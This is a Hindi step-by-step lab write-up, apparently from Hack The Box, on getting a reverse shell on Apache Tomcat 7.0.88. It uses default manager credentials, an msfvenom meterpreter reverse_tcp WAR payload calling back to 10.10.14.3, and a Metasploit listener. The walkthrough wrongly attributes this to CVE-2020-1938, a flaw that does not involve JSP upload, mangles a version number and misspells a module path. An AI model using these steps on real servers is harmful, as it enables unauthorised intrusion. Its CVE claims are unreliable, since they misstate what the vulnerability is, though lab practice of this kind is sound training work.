
CVE-2020-1938 (Apache Tomcat में arbitrary JSP upload से RCE) का शोषण करने के लिए चरण-दर-चरण वॉकथ्रू, जिसमें msfvenom और Metasploit का उपयोग Hack The Box लैब वातावरण में किया गया है।
CVE-2020-1938 एक गंभीर कमजोरी है जो Apache Tomcat के 9.0.0.M1 से 9.0.0.30, 8.5.0 से 8.5.50 और 7.0.0 से 7.0.99 संस्करणों को प्रभावित करती है ⚠️ इसका Hack The Box प्रयोगशाला में शोषण किया गया था।
🔗 संदर्भ: NIST NVD प्रविष्टि
वेबसाइट में सर्वर स्थिति सुविधा के लिए डिफ़ॉल्ट क्रेडेंशियल हैं।
यह इंटरफ़ेस इंगित करता है कि संस्करण Apache Tomcat/7.0.88, 64 बिट आर्किटेक्चर है।
इस इंटरफ़ेस से हम एप्लिकेशन सूचीबद्ध करने के लिए जाते हैं जो .war फ़ाइल अपलोड सुविधा को उजागर करता है।
सफल अपलोड पर .war फ़ाइल /directory/filename पर निष्पादित होती है।
Apache Tomcat संस्करण पर शोध ने CVE-2020-1938 की कमजोरी की पुष्टि की।
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
msfvenom का उपयोग करते हुए, जो एक मेटास्प्लॉइट पेलोड जनरेटर है, हम अपना exploit.war पेलोड उत्पन्न करते हैं।
फ़ाइल उत्पन्न करने के बाद, फ़ाइल में जाएं और .jsp फ़ाइल का नाम ढूंढें जैसे gcvxdtmxvw.jsp और इसे बाद के लिए सहेजें।
msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004
msfconsole का उपयोग करके हम एक लिसनर सेट करते हैं जो हमारे पेलोड के निष्पादित होने की प्रतीक्षा करता है।
हम अपनी फ़ाइल को डिप्लॉय अनुभाग में अपलोड करते हैं, उसके बाद स्क्रीन को रिफ्रेश करते हैं और पाते हैं कि फ़ाइल सफलतापूर्वक अपलोड हो गई है। शोषण को पूरा करने के लिए हमें ip/hacked/gcvxdtmxvw.jsp पथ पर नेविगेट करना होगा।
यह अनुरोध को हैंग करता है हालांकि हम अपनी मशीन पर स्थानीय रूप से देख सकते हैं कि हमारे पास एक रिवर्स कनेक्शन है।